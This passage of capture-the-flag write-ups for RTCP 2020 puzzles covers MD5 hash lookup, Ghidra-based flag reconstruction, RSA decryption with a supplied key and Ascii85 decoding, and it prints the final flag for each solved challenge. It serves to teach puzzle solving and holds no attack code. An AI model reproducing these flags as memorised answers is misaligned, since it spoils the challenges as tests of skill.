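        raise ValueError(f"key has {len(key)} entries for {len(names)} codons")
    letters = []
    for name, k in zip(names, key):
        if not 1 <= k <= len(name):
            raise ValueError(f"index {k} is out of range for {name}")
        letters.append(name[k - 1])
    return "".join(letters)


if __name__ == "__main__":
    print(decode(RNA, KEY))  # mycuTehousepLanT
```

<p>Case and word boundaries are not encoded; the author added them by hand to get the flag below.</p>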
<p>That gives us the final flag, once the case, spaces and format are fixed: <code>rtcp{my_cute_houseplant}</code>.</p>
<p><em><a href="/rtcp-dont-give-the-giant-a-cookie.html">RTCP - Don't Give The GIANt a COOKie</a> - 2020-01-25 - nlegall</em></p>
<p><em>solves : 397</em></p>
<div class="highlight"><pre><span></span><code>Point : 100
It was just a typical day in the bakery for Delphine. She was preparing her famous chocolate cake, when all of a sudden a GIANt burst through the doors of her establishment and demanded a cookie. Being the strong-willed girl she was, Delphine refused and promptly threw her rolling pin at the GIANt. Doing what any sensible being would do when faced with projectiles, the GIANt let out a shriek and ran out of the shop. Delphine smiled to herself, it was another day well done.
But oh? What's this? It seems the GIANt dropped this behind while he was screaming and scrambling out of the shop.
69acad26c0b7fa29d2df023b4744bf07
</code></pre></div>
<p>We need to reverse a hash. First, check what type of hash it is:</p>
<div class="highlight"><pre><span></span><code>$ hashid 69acad26c0b7fa29d2df023b4744bf07
Analyzing <span class="s1">'69acad26c0b7fa29d2df023b4744bf07'</span>
<span class="o">[</span>+<span class="o">]</span> MD5
</code></pre></div>
<p>Ok, perfect. An unsalted MD5 of a common string is easy to reverse since large precomputed lookup tables (rainbow tables) exist for it. <a href="https://crackstation.net/">Crackstation</a> is one of the websites that offers such a lookup. We enter the hash and launch the search:</p>
<table>
<thead>
<tr>
<th>Hash</th>
<th>Type</th>
<th>Result</th>
</tr>
</thead>
<tbody>
<tr>
<td>69acad26c0b7fa29d2df023b4744bf07</td>
<td>md5</td>
<td>chocolate mmm</td>
</tr>
</tbody>
</table>
<p>The website found it and gives us the clear text. We add the flag wrapper and get the final flag: <code>rtcp{chocolate mmm}</code>.</p>
<p><em><a href="/rtcp-ghost-in-the-system.html">RTCP - ghost-in-the-system</a> - 2020-01-25 - nlegall</em></p>
<p><em>solves : 138</em></p>
<div class="highlight"><pre><span></span><code>Point : 1500
I think my ls is being haunted... the colors are all weird!!! What's that? It's highlighting things?! Where!!?
Hint: Flag is 100 characters long. It starts with rtcp{ and ends with }. The first character is w
Hint 2: The flag is written in standard leet, the only exceptions are the flag wrapping (rtcp{}) and underscores (_)
</code></pre></div>
<p>We can use IDA Pro or Ghidra to get pseudo code from the binary. I used Ghidra for this challenge. We open the file with it and go to the <code>main</code> function. We find some code that contains the beginning of the flag (<code>rtcp</code>) and builds the whole flag, as shown below:</p>
<div class="highlight"><pre><span></span><code> <span class="k">if</span> <span class="p">(</span><span class="n">bVar4</span><span class="p">)</span> <span class="p">{</span>
<span class="n">allocator</span><span class="p">();</span>
<span class="n">basic_string</span><span class="p">((</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">otxt</span><span class="p">,</span>
<span class="p">(</span><span class="n">allocator</span> <span class="o">*</span><span class="p">)</span>
<span class="s">"s}yvzezqr[..]_eec12"</span>
<span class="p">);</span>
<span class="o">~</span><span class="n">allocator</span><span class="p">((</span><span class="n">allocator</span><span class="o"><</span><span class="kt">char</span><span class="o">></span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">__for_end</span><span class="p">);</span>
<span class="n">pcVar7</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">operator</span><span class="p">[]((</span><span class="n">basic_string</span><span class="o"><</span><span class="kt">char</span><span class="p">,</span><span class="n">std</span><span class="o">--</span><span class="n">char_traits</span><span class="o"><</span><span class="kt">char</span><span class="o">></span><span class="p">,</span><span class="n">std</span><span class="o">--</span><span class="n">allocator</span><span class="o"><</span><span class="kt">char</span><span class="o">>></span>
<span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">otxt</span><span class="p">,</span><span class="mh">0x1f0</span><span class="p">);</span>
<span class="n">flg</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="o">*</span><span class="n">pcVar7</span><span class="p">;</span>
<span class="n">pcVar7</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">operator</span><span class="p">[]((</span><span class="n">basic_string</span><span class="o"><</span><span class="kt">char</span><span class="p">,</span><span class="n">std</span><span class="o">--</span><span class="n">char_traits</span><span class="o"><</span><span class="kt">char</span><span class="o">></span><span class="p">,</span><span class="n">std</span><span class="o">--</span><span class="n">allocator</span><span class="o"><</span><span class="kt">char</span><span class="o">>></span>
<span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">otxt</span><span class="p">,</span><span class="mh">0x192</span><span class="p">);</span>
<span class="n">flg</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="o">*</span><span class="n">pcVar7</span><span class="p">;</span>
<span class="n">pcVar7</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">operator</span><span class="p">[]((</span><span class="n">basic_string</span><span class="o"><</span><span class="kt">char</span><span class="p">,</span><span class="n">std</span><span class="o">--</span><span class="n">char_traits</span><span class="o"><</span><span class="kt">char</span><span class="o">></span><span class="p">,</span><span class="n">std</span><span class="o">--</span><span class="n">allocator</span><span class="o"><</span><span class="kt">char</span><span class="o">>></span>
<span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">otxt</span><span class="p">,</span><span class="mh">0x322</span><span class="p">);</span>
<span class="n">flg</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="o">*</span><span class="n">pcVar7</span><span class="p">;</span>
<span class="p">[...]</span>
<span class="n">pcVar7</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">operator</span><span class="p">[]((</span><span class="n">basic_string</span><span class="o"><</span><span class="kt">char</span><span class="p">,</span><span class="n">std</span><span class="o">--</span><span class="n">char_traits</span><span class="o"><</span><span class="kt">char</span><span class="o">></span><span class="p">,</span><span class="n">std</span><span class="o">--</span><span class="n">allocator</span><span class="o"><</span><span class="kt">char</span><span class="o">>></span>
<span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">otxt</span><span class="p">,</span><span class="mh">0x2f7</span><span class="p">);</span>
<span class="n">flg</span><span class="p">[</span><span class="mi">98</span><span class="p">]</span> <span class="o">=</span> <span class="o">*</span><span class="n">pcVar7</span><span class="p">;</span>
<span class="n">pcVar7</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">operator</span><span class="p">[]((</span><span class="n">basic_string</span><span class="o"><</span><span class="kt">char</span><span class="p">,</span><span class="n">std</span><span class="o">--</span><span class="n">char_traits</span><span class="o"><</span><span class="kt">char</span><span class="o">></span><span class="p">,</span><span class="n">std</span><span class="o">--</span><span class="n">allocator</span><span class="o"><</span><span class="kt">char</span><span class="o">>></span>
<span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">otxt</span><span class="p">,</span><span class="mh">0xe6</span><span class="p">);</span>
<span class="n">flg</span><span class="p">[</span><span class="mi">99</span><span class="p">]</span> <span class="o">=</span> <span class="o">*</span><span class="n">pcVar7</span><span class="p">;</span>
</code></pre></div>
<p>Following the code by hand would take forever, but a Python script does it in no time. I copied all the indexes from the decompiled code into a file and read them line by line:</p>
<div class="highlight"><pre><span></span><code><span class="n">a</span> <span class="o">=</span> <span class="s2">"s}yvzezqr_6x45jx2yp4d38qq1mvnsl0u7w32lr12gi}t3i5kw0oewkqb_vv6726}}95cmfy_jfgyx25n1e9cuyvsor_0mijcnhoa2kpvdtjd9js2kstbe5}s6zgyil6qxtr}wbol}dzmg3t02466hu1gkpm2xv8u{ryn0s11uzu_426p8k4owb21f3buof6ok</span><span class="si">{cp9s2s88k3yhzdsq1d2u7n3}</span><span class="s2">9ex}9sly0p0}lp5yxdi7m37_p82o54im1z7bw5u2tu9n2loybmr51jih8lxf7z6n62goh3_63cnnbfczhmsy4pe}ijluq9xbkk4d</span><span class="si">{c13s5hjkjldeww9z}</span><span class="s2">78oyt1pog5qudz{6fkw_wgon99yc{7v4sakj6pddk5i1c_1g74e_xwivk7mmbm16it6zxfc1y6sdz</span><span class="si">{0zrmuvysbl}</span><span class="s2">pmw8z6jb8ejmrqknxbu5w4sv542plnzs8_}znyq6b6x67ar0lsq04qu742uenp4ufoxz7ir8gzohi352}7{9hk{yu4_zbj7gmvl{c_24weh8rwxp_24dhp</span><span class="si">{giv9k}</span><span class="s2">gz840uezqk9s}qxi</span><span class="si">{2u2lbbt4i}</span><span class="s2">kq8gomrqewvrj65dgwaoitc99yh4jest6sccnz2wlgmap6f9k04lhanc3wmgpj6xawln_jce6c6vfttu{zws4odom7{h5hewr_</span><span class="si">{5}</span><span class="s2">6fty4a14ar64q1vvg0s28zsik}nhpmw}j92s42k}zzxx0bn7cddk70iw4</span><span class="si">{f8wqguyj6a58s0u2}</span><span class="s2">xzwh{0vdawdge8n88j6ms8uvt_r4hezvei3u2k179tlepun{c1l02_e92ijk9xx0o_a8gwnmp1jr9gtk2</span><span class="si">{cq7qnmrphvyecps}</span><span class="s2">63cqvxcy</span><span class="si">{i5}</span><span class="s2">d2r1r</span><span class="si">{rg1n}</span><span class="s2">nufm7sue378uwdqe9ezscxoq90nme76}jx4}}b8ahe_paby2qxqwop63kc6eujs7}f90pkkiddlvfobb24wj52wzu2cnhoa_p4jjw4nh9kr5gif04ojbh1e_eec12"</span>
<span class="n">flag</span> <span class="o">=</span> <span class="s2">""</span>
<span class="n">fo</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s2">"index"</span><span class="p">,</span> <span class="s2">"r"</span><span class="p">)</span>
<span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">fo</span><span class="o">.</span><span class="n">readlines</span><span class="p">():</span>
<span class="n">line</span> <span class="o">=</span> <span class="n">line</span><span class="o">.</span><span class="n">rstrip</span><span class="p">()</span>
<span class="c1"># Convert the hex index to decimal</span>
<span class="n">line</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">line</span><span class="p">,</span> <span class="mi">16</span><span class="p">)</span>
<span class="n">flag</span> <span class="o">=</span> <span class="n">flag</span> <span class="o">+</span> <span class="n">a</span><span class="p">[</span><span class="n">line</span><span class="p">]</span>
<span class="nb">print</span><span class="p">(</span><span class="n">flag</span><span class="p">)</span>
</code></pre></div>
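<p>Rather than copying the indexes into a file by hand, the (<code>otxt</code> index, <code>flg</code> slot) pairs can be pulled straight out of the decompiler text with a regular expression and reassembled in slot order, which also catches assignments that appear out of order and slots the excerpt does not cover. The script below is an added example, not the post's script: it runs on a short constructed stand-in for the <code>otxt</code> string and a constructed Ghidra-style excerpt, and the regex assumes the <code>&amp;otxt,0x..);</code> / <code>flg[n] = *pcVar7;</code> layout shown in the decompiled code above.</p>

```python
import re

# Regex for the pair of statements Ghidra emits per flag character:
#     ... &otxt,0x192);
#     flg[1] = *pcVar7;
# Group 1 is the index into otxt (hex or decimal), group 2 the flg slot.
PAIR_RE = re.compile(
    r"&otxt\s*,\s*(0x[0-9a-fA-F]+|\d+)\s*\)\s*;"
    r"\s*flg\s*\[\s*(\d+)\s*\]\s*=\s*\*pcVar7\s*;"
)


def _to_int(token: str) -> int:
    """Ghidra prints small indexes in decimal and larger ones as 0x.. literals."""
    return int(token, 16) if token.lower().startswith("0x") else int(token)


def extract_mapping(decompiled: str) -> dict:
    """Map each flg slot to the otxt index it is assigned from, in any order."""
    mapping = {}
    for otxt_idx, flg_idx in PAIR_RE.findall(decompiled):
        slot = int(flg_idx)
        if slot in mapping:
            raise ValueError(f"flg[{slot}] is assigned twice")
        mapping[slot] = _to_int(otxt_idx)
    return mapping


def rebuild_flag(mapping: dict, book: str) -> str:
    """Emit the flag in slot order; slots the excerpt does not cover become '?'."""
    if not mapping:
        return ""
    out = []
    for slot in range(max(mapping) + 1):
        if slot not in mapping:
            out.append("?")
            continue
        idx = mapping[slot]
        if idx >= len(book):
            raise ValueError(f"otxt index {idx:#x} is past the end of the string")
        out.append(book[idx])
    return "".join(out)


# Constructed sample: a short stand-in for the otxt string and a decompiler
# excerpt in Ghidra's style, with the slots deliberately out of order.
SAMPLE_BOOK = "{prtc}"
SAMPLE_DECOMPILED = """
pcVar7 = (char *)operator[]((basic_string<char,std--char_traits<char>,std--allocator<char>>
*)&otxt,0x3);
flg[1] = *pcVar7;
pcVar7 = (char *)operator[]((basic_string<char,std--char_traits<char>,std--allocator<char>>
*)&otxt,2);
flg[0] = *pcVar7;
pcVar7 = (char *)operator[]((basic_string<char,std--char_traits<char>,std--allocator<char>>
*)&otxt,0x5);
flg[5] = *pcVar7;
pcVar7 = (char *)operator[]((basic_string<char,std--char_traits<char>,std--allocator<char>>
*)&otxt,0x4);
flg[2] = *pcVar7;
pcVar7 = (char *)operator[]((basic_string<char,std--char_traits<char>,std--allocator<char>>
*)&otxt,0);
flg[4] = *pcVar7;
pcVar7 = (char *)operator[]((basic_string<char,std--char_traits<char>,std--allocator<char>>
*)&otxt,0x1);
flg[3] = *pcVar7;
"""

if __name__ == "__main__":
    m = extract_mapping(SAMPLE_DECOMPILED)
    print(m)
    print(rebuild_flag(m, SAMPLE_BOOK))  # rtcp{}
```

<p>Pointing <code>extract_mapping</code> at the full Ghidra output and <code>rebuild_flag</code> at the real <code>otxt</code> string gives the same result as the index file, without the manual transcription step.</p>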
<p>Running the script against the index file prints the flag:</p>
<div class="highlight"><pre><span></span><code>$ python ghost.py
rtcp<span class="o">{</span>wh37h3r_1n4n1m473_f16ur35_0r_un4u7h0r1z3d_c0d3_7h3r35_4lw4y5_4_6h057_1n_7h3_5y573m_1056_726_00<span class="o">}</span>
</code></pre></div>
<h1>RTCP - Growls at the chicken</h1>
<p><em>Published 2020-01-25 by nlegall - <a href="/rtcp-growls-at-the-chicken.html">/rtcp-growls-at-the-chicken.html</a></em></p>
<p><em>solves : 38</em></p>
<div class="highlight"><pre><span></span><code>Point : 1000
grrrrrrR
big chicken, i hisS At you!!!
hint: NQr2MIa1jsaifAVOn3zYeMynNJwd4oBiiem4fJHsA1WjzfyhUp1+seCW0GMijoDHb3w9BMKj7aw6hhtae5/Qw5xOqMioJU3vvEj0BEHO1wInPqlOeTRdZb8BcTsXP+Z/KBA2FjSZcpGHo7rOZ7NtR15y3eY4s/e/tgKUHvPe9MdmDe1kINtyRXgjghJO9e3uMEQmFe2Ai5moVnG7yIVfUd3QG6/Z+K4PSttbJtjWSLFO7zpmYpEOg3XBxsOw/w5scJQqJ7OLGiH22u4+JFXRlD/wPmDzk9uYlLWLcCuxnY0xuMlSfKIFJtVmF0ViO4o4X89ZwsQjjHuYYDaB3el7iA63BzBlsC54Q7Ekv70/GI0UA3R3zJkMaBV12Z6NAE/kAgEJu9ZRcVm6MAIZInLwMU4R1frM0Bks1jeTe72agmxnAIrR8XDeAxzovbvXFwoxNyxiA63fPJGPVoGZq4ecfGvJ23i/Cg+cynB35lc3f+4QifpjCn+MxWkKCzCVEJXdDah19yXKlIxbaR1zm+YHkS0YSUzjr7NJUXHfDCrwAUpXpikfi2f9tgcXEnuhszScE1PCbdt22rRz1pS7MNdRxjCZ5j+8BQNRBLi2BjLGW14X3zd4d6ieoHWH+4fmbqU9dFsUgKN5qL4Gs2LZbbQwkf3+VbIRQK9RaSO9Hj+4/T0=
hint 2: Public [...]
hint 3: Private [...]
</code></pre></div>
<p>OK, we have a base64-encoded message, a public something and a private something. If we read the description carefully, the capital letters spell the word <code>RSA</code>. The two other strings are the public key and the private key; only the private one is needed to decrypt.</p>
<p>We can reconstruct the private key by adding the PEM header and footer and replacing every space with a newline (on OpenSSL 3.x, <code>rsautl</code> is deprecated and <code>openssl pkeyutl -decrypt -inkey private.key</code> does the same job):</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">echo</span> <span class="s2">"-----BEGIN RSA PRIVATE KEY-----"</span> > private.key
$ <span class="nb">echo</span> <span class="s2">"MIIJKQIBAAKCAg[...]QdgsTn"</span> >> private.key
$ <span class="nb">echo</span> <span class="s2">"-----END RSA PRIVATE KEY-----"</span> >> private.key
$ sed -i <span class="s1">'/^-----/! s/ /\n/g'</span> private.key
$ cat message<span class="p">|</span> base64 -d <span class="p">|</span> openssl rsautl -decrypt -inkey private.key -in -
unknown-123-246-470-726.herokuapp.com
</code></pre></div>
<p>The plaintext is the address of a website:</p>
<p><a href="https://unknown-123-246-470-726.herokuapp.com/">https://unknown-123-246-470-726.herokuapp.com/</a></p>
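<p>The label you prepend has to match the DER inside the blob: a PKCS#1 <code>RSAPrivateKey</code> takes <code>RSA PRIVATE KEY</code>, while a PKCS#8 <code>PrivateKeyInfo</code> takes <code>PRIVATE KEY</code>, and a mismatched label can make the key fail to load. The Python below is an added example, not the post's commands: it tells the two apart from the first few DER bytes, rebuilds a 64-column PEM from a space-mangled body, and checks the visible prefix of the challenge key, <code>MIIJKQIBAAKCAg</code>. The two DER stubs are constructed and are not real keys, and the script stops at the PEM file; the decryption step is still <code>openssl pkeyutl -decrypt</code> (or <code>rsautl</code>) as above.</p>

```python
import base64
import re


def _der_tlv(buf: bytes, pos: int):
    """Read one DER tag and length at pos; return (tag, length, offset of the value)."""
    tag = buf[pos]
    first = buf[pos + 1]
    if first < 0x80:                      # short form: one length byte
        return tag, first, pos + 2
    n = first & 0x7F                      # long form: next n bytes hold the length
    length = int.from_bytes(buf[pos + 2 : pos + 2 + n], "big")
    return tag, length, pos + 2 + n


def pem_label_for(der: bytes) -> str:
    """Choose the PEM label from the start of the DER.

    PKCS#1 RSAPrivateKey  = SEQUENCE { INTEGER version, INTEGER n, ... }
    PKCS#8 PrivateKeyInfo = SEQUENCE { INTEGER version, SEQUENCE algorithm, ... }
    Only the first bytes are inspected, so a truncated blob is enough.
    """
    tag, _, pos = _der_tlv(der, 0)
    if tag != 0x30:
        raise ValueError("not a DER SEQUENCE; is the blob really a base64 key?")
    tag, length, pos = _der_tlv(der, pos)
    if tag != 0x02:
        raise ValueError("expected an INTEGER version after the outer SEQUENCE")
    following = der[pos + length]         # tag of the element after the version
    if following == 0x02:
        return "RSA PRIVATE KEY"
    if following == 0x30:
        return "PRIVATE KEY"
    raise ValueError(f"unexpected tag {following:#x} after the version field")


def rebuild_pem(blob: str) -> str:
    """Turn a base64 body mangled by spaces or line breaks into a proper PEM file."""
    body = "".join(blob.split())
    if not re.fullmatch(r"[A-Za-z0-9+/]+=*", body):
        raise ValueError("body contains characters outside the base64 alphabet")
    der = base64.b64decode(body, validate=True)
    label = pem_label_for(der)
    lines = [body[i : i + 64] for i in range(0, len(body), 64)]
    return f"-----BEGIN {label}-----\n" + "\n".join(lines) + f"\n-----END {label}-----\n"


# The first 14 base64 characters the page shows for the challenge's private key.
CHALLENGE_KEY_PREFIX = "MIIJKQIBAAKCAg"


def label_from_prefix(prefix: str) -> str:
    """Detect the format from a base64 prefix alone (only whole 4-char groups decode)."""
    usable = prefix[: len(prefix) // 4 * 4]
    return pem_label_for(base64.b64decode(usable))


# Constructed DER stubs (not real keys): just enough structure to exercise the check.
PKCS1_STUB = bytes.fromhex("30080201000203010001")      # SEQ { INT 0, INT 65537 }
PKCS8_STUB = bytes.fromhex("300a020100300506032a8648")  # SEQ { INT 0, SEQ { OID } }
PKCS8_STUB_B64 = base64.b64encode(PKCS8_STUB).decode()
# The same body with a space every four characters, as in the challenge text.
MANGLED_PKCS8 = " ".join(PKCS8_STUB_B64[i : i + 4] for i in range(0, len(PKCS8_STUB_B64), 4))

if __name__ == "__main__":
    print(label_from_prefix(CHALLENGE_KEY_PREFIX))  # RSA PRIVATE KEY
    print(rebuild_pem(MANGLED_PKCS8))
```

<p>For the challenge key the prefix decodes to <code>30 82 09 29 02 01 00 02 82</code>: a SEQUENCE, a one-byte INTEGER version, then another INTEGER (the modulus), so the <code>RSA PRIVATE KEY</code> label used above is the right one.</p>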
<p><img alt="chicken1" src="https://blog.nlegall.fr/images/rtcp/chicken1.png"></p>
<p>We get a wonderful GIF and some text in the browser console:</p>
<div class="highlight"><pre><span></span><code><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Jade: psst'</span><span class="p">);</</span><span class="nt">script</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Jade: You there?'</span><span class="p">);</</span><span class="nt">script</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Agate: *laughs*'</span><span class="p">);</</span><span class="nt">script</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Jade: Well lets hope the chicken doesnt explod'</span><span class="p">);</</span><span class="nt">script</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Agate: Hah, didnt Jess leave a defuser?'</span><span class="p">);</</span><span class="nt">script</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Jade: Yep, its in the drawer'</span><span class="p">);</</span><span class="nt">script</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Agate: Ill grab it.'</span><span class="p">);</</span><span class="nt">script</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'ono.'</span><span class="p">);</</span><span class="nt">script</span><span class="p">></span>
</code></pre></div>
<p>Looking at the page source, we find two hidden <code>&lt;p&gt;</code> elements:</p>
<div class="highlight"><pre><span></span><code><span class="p"><</span><span class="nt">p</span> <span class="na">hidden</span><span class="p">></span>9 20 30 15 16 5 14 19 30 27 29 8 20 13 12 28<span class="p"></</span><span class="nt">p</span><span class="p">></span>
<span class="p"><</span><span class="nt">p</span> <span class="na">hidden</span><span class="p">></span>"abcdefghijklmnopqrstuvwxyz[]. "<span class="p"></</span><span class="nt">p</span><span class="p">></span>
</code></pre></div>
<p>Let's map one onto the other, treating each number as a 1-based index into the character set:</p>
<div class="highlight"><pre><span></span><code><span class="n">keys</span> <span class="o">=</span> <span class="p">[</span><span class="mi">9</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">27</span><span class="p">,</span> <span class="mi">29</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">28</span><span class="p">]</span>
<span class="n">chars</span> <span class="o">=</span> <span class="s2">"abcdefghijklmnopqrstuvwxyz[]. "</span>
<span class="n">flag</span> <span class="o">=</span> <span class="s2">""</span>
<span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">keys</span><span class="p">:</span>
<span class="n">flag</span> <span class="o">=</span> <span class="n">flag</span> <span class="o">+</span> <span class="n">chars</span><span class="p">[</span><span class="n">x</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
<span class="nb">print</span><span class="p">(</span><span class="n">flag</span><span class="p">)</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code>$ python map.py
it opens <span class="o">[</span>.html<span class="o">]</span>
</code></pre></div>
<p>Hmm. This looks like the tail of a new link, so we need its first part. The answer is in the dialogue between the characters: <code>Yep, its in the drawer</code>. The full link is <a href="https://unknown-123-246-470-726.herokuapp.com/drawer.html">https://unknown-123-246-470-726.herokuapp.com/drawer.html</a>.</p>
<p><img alt="chicken1" src="https://blog.nlegall.fr/images/rtcp/chicken1.png"></p>
<p>The same page shows up but, once again, the page source holds the relevant information:</p>
<div class="highlight"><pre><span></span><code><span class="p"><</span><span class="nt">p</span> <span class="na">hidden</span><span class="p">></span>rtcp{ch1ck3n_4nd_th3_3gg}<span class="p"></</span><span class="nt">p</span><span class="p">></span>
</code></pre></div>
<h1>RTCP - HOOOOOOOOOOMEEEEEE RUNNNNNNNNNNNNN!!!!!</h1>
<p><em>Published 2020-01-25 by nlegall - <a href="/rtcp-hoooooooooomeeeeee-runnnnnnnnnnnnn.html">/rtcp-hoooooooooomeeeeee-runnnnnnnnnnnnn.html</a></em></p>
<p><em>solves : 605</em></p>
<div class="highlight"><pre><span></span><code><span class="n">Point</span> <span class="o">:</span> <span class="mi">50</span>
<span class="n">AND</span> <span class="n">JAKE</span> <span class="n">IS</span> <span class="n">ROUNDING</span> <span class="n">THE</span> <span class="n">BASES</span>
<span class="n">HE</span> <span class="n">PASSES</span> <span class="n">BASE</span> <span class="mi">32</span><span class="o">!!!</span>
<span class="n">HE</span> <span class="n">ROUNDS</span> <span class="n">BASE</span> <span class="mi">64</span><span class="o">!!!!!!!</span>
<span class="n">WE</span><span class="s1">'RE WITNESSING A MIRACLE!!!!!!!!!!!!!</span>
<span class="s1">Just one more base to go ;D</span>
<span class="s1">Hint : Ecbf1HZ_kd8jR5K?[";(7;aJp?[4>J?Slk3<+n'</span><span class="n">pF</span><span class="o">]</span><span class="n">W</span><span class="o">^,</span><span class="n">F</span><span class="o">>.</span><span class="n">_lB</span><span class="o">/=</span><span class="n">r</span>
</code></pre></div>
<p>We are looking for the next base encoding after base64. It is not base128, so the base should lie between 64 and 128.</p>
<p>After some research, we find base85 (Ascii85). We can decode it with the code on GitHub: <a href="https://github.com/judsonx/base85">https://github.com/judsonx/base85</a>.</p>
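<p>Base85 is not one encoding: Ascii85 (what the judsonx tool and the hint use, alphabet <code>!</code> to <code>u</code> with <code>z</code> standing for four zero bytes) differs from Z85 and RFC 1924 base85, which use other alphabets, so the wrong flavour yields garbage rather than an error. The decoder below is an added example, written here rather than taken from the post or the judsonx repository: it implements Ascii85 by hand, including partial trailing groups, checks itself against Python's <code>base64.a85decode</code>, and decodes the challenge hint.</p>

```python
import base64

# Challenge hint, copied from the page (no whitespace, no 'z' groups).
HINT = r"""Ecbf1HZ_kd8jR5K?[";(7;aJp?[4>J?Slk3<+n'pF]W^,F>._lB/=r"""


def a85_decode(text: str) -> bytes:
    """Decode Ascii85: 5 chars from '!'..'u' encode 4 big-endian bytes, 'z' is four NULs."""
    out = bytearray()
    group = []

    def flush(chars, pad):
        # A partial group is padded with 'u' (value 84) and `pad` trailing bytes dropped.
        value = 0
        for v in [ord(c) - 33 for c in chars] + [84] * pad:
            value = value * 85 + v
        if value > 0xFFFFFFFF:
            raise ValueError(f"group {''.join(chars)!r} overflows 32 bits")
        out.extend(value.to_bytes(4, "big")[: 4 - pad])

    for c in text:
        if c in " \t\r\n":
            continue
        if c == "z":
            if group:
                raise ValueError("'z' is only valid between groups")
            out.extend(b"\x00\x00\x00\x00")
            continue
        if not "!" <= c <= "u":
            raise ValueError(f"{c!r} is outside the Ascii85 alphabet")
        group.append(c)
        if len(group) == 5:
            flush(group, 0)
            group.clear()
    if len(group) == 1:
        raise ValueError("a trailing group needs at least two characters")
    if group:
        flush(group, 5 - len(group))
    return bytes(out)


def decode_hint() -> bytes:
    return a85_decode(HINT)


def matches_stdlib(text: str) -> bool:
    """Cross-check the hand-rolled decoder against the standard library."""
    return a85_decode(text) == base64.a85decode(text.encode())


def roundtrip_ok(data: bytes) -> bool:
    """Encode with the stdlib (which emits 'z' for zero groups) and decode by hand."""
    return a85_decode(base64.a85encode(data).decode()) == data


if __name__ == "__main__":
    print(decode_hint().decode())  # rtcp{uH_JAk3_w3REn't_y0u_4t_Th3_uWust0r4g3}
```

<p>The 54-character hint is ten full groups plus a four-character tail, which decodes to 43 bytes; the tail is padded with <code>u</code> and its last byte discarded, which is why a partial group can never be a single character.</p>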
<p>We clone and build the tool from source. The hint can be written to a file, or piped in with <code>|</code> to avoid one:</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">echo</span> <span class="s2">"Ecbf1HZ_kd8jR5K?[\";(7;aJp?[4>J?Slk3<+n'pF]W^,F>._lB/=r"</span> <span class="p">|</span> ./build/ascii85 -d
rtcp<span class="o">{</span>uH_JAk3_w3REn<span class="err">'</span>t_y0u_4t_Th3_uWust0r4g3<span class="o">}</span>
</code></pre></div>
<h1>RTCP - Hump's Day</h1>
<p><em>Published 2020-01-25 by nlegall - <a href="/rtcp-humps-day.html">/rtcp-humps-day.html</a></em></p>
<p><em>solves : 38</em></p>
<div class="highlight"><pre><span></span><code>Point : 1050
Happy Hump's Day
Happy TGIF!
Happy Saturday
Happy Tuesday +1
Happy Thursday +1
Happy TGIF -2
Happy Monday!
Happy Hump's day +5 3 times
Happy Saturday +3
Happy TGIF +1
Happy Tuesday +0
Happy Friday +3
Happy TGIF -1
Happy Wednesday
Happy TGIF
Happy Sunday
Happy Saturday -5
Hint: Hump's day is on what day of this ctf?
Hint 2: The Lotus would be proud. Decimate your enemies, gather more hexenon, string the grineer up! simple. Isn't it?
